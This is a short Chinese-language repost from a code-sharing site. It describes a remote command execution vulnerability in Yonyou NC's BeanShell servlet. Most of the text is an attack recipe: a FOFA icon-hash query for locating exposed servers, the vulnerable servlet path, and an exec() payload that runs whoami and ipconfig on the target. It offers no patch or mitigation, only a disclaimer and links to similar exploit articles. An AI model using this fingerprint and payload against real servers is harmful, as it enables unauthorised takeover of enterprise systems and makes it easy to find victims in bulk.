碼上歡樂
相關內容    簡體    繁體

用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞

本文轉載自   查看原文   2021-06-03 09:53   1480    滲透測試

用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,通過BeanShell 執行遠程命令獲取服務器權限

FOFA:
icon_hash="1085941792"
漏洞Url為

/servlet/~ic/bsh.servlet.BshServlet

執行
exec("cmd.exe /c whoami&&ipconfig")


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞 用友bsh.servlet.BshServlet命令執行 CNVD-2021-30167:用友NC BeanShell遠程代碼執行漏洞復現 用友NC BeanShell遠程代碼執行漏洞(CNVD-2021-30167) X友 NC 遠程命令執行 nc Beanshell組件遠程代碼執行漏洞復現 用友NC任意文件上傳漏洞復現 Fastjson 1.2.47 遠程命令執行漏洞 PHPMailer遠程命令執行漏洞溯源 Cisco Smart Install遠程命令執行漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM